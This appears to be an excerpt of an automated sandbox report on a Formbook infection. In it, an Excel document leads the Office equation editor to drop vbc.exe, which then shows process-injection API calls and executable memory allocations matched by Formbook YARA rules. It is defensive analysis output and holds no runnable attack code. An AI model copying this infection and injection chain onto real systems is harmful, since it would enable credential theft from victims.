          Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E03BC NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_004181C0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00418270 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_004182F0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_004181BA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041826A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00930078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00930060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0093010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00931148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00931930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00930C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00931D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0092FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_002067C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 10_2_002067C2 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F400C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F407AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F401D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F41148 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F4010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F410D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F40078 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F40060 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F40048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F41930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F41D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F40C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F3FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_001081C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_00108270 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_001082F0 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_001083A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_001081BA NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010826A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5879
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002ED101
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EE178
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E2140
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EAA70
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E7BE0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002ED410
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E6E28
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1729
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0FB8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E2FC8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9928
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E711B
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9919
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EE168
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5180
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5190
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5B58
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E53B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0470
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E3D90
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E4DF8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E6E19
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5663
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5690
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9F68
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E3FA0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002E3F90
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D2040
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D2464
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D47AB
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D0E78
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D0E88
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D8F28
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D8F20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_005D6DB7
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041B8A3
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041C23F
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041C2AF
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041C3DF
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00408C60
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041CC13
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041B4A3
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041BD9B
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041BE60
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0041C603
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0093E0C6
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0096D005
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0095905A
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00943040
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009BD06D
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0093E2E9
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009E1238
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009E63BF
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009663DB
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0093F3CF
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00942305
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00947353
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0098A37B
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00975485
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00951489
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009C443E
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0097D47D
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0095C5F0
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009C05E3
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0094351F
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00986540
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00944680
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0094E6C1
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0098A634
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009E2622
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009C579A
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0094C7BC
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009757C3
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009BF8C4
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009DF8EE
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0094C85C
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0096286D
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009E098E
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009429B2
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009569FE
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009C5955
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009C394B
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009F3A83
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009ECBA4
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0093FBD7
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009CDBDA
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009C6BCB
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00967B00
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009DFDDD
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00970D3B
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0094CD5B
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00972E2F
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0095EE4C
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009DCFB1
          Source: C:\Users\Public\vbc.exeCode function: 10_2_009B2FDC
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00950F3F
          Source: C:\Users\Public\vbc.exeCode function: 10_2_0096DF7C
          Source: C:\Users\Public\vbc.exeCode function: 10_2_002067C7
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00205062
          Source: C:\Users\Public\vbc.exeCode function: 10_2_002032FF
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00203302
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00201362
          Source: C:\Users\Public\vbc.exeCode function: 10_2_002075B2
          Source: C:\Users\Public\vbc.exeCode function: 10_2_002008F9
          Source: C:\Users\Public\vbc.exeCode function: 10_2_00200902
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F4E0C6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F6905A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F53040
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F7D005
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F763DB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F4F3CF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FF63BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F9A37B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F57353
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F52305
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F4E2E9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FF1238
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F6C5F0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F96540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F5351F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F85485
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F61489
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F8D47D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FD443E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F857C3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F5C7BC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FD579A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F5E6C1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F54680
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F9A634
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FF2622
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F669FE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F529B2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FF098E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_02003A83
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FD5955
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FD394B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FEF8EE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F7286D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F5C85C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F4FBD7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FDDBDA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FFCBA4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F77B00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FEFDDD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F5CD5B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F80D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FC2FDC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01FECFB1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F7DF7C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F60F3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F6EE4C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_01F82E2F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010C603
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_0010CC13
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_000F8C60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_000F2D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 12_2_000F2FB0
          Source: Doc_37584567499454.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exeCode function: String function: 0093DF5C appears 123 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0098373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009AF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00983F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0093E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01F4DF5C appears 121 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01FBF970 appears 84 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01F93F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01F9373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 01F4E2A8 appears 38 times
          Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
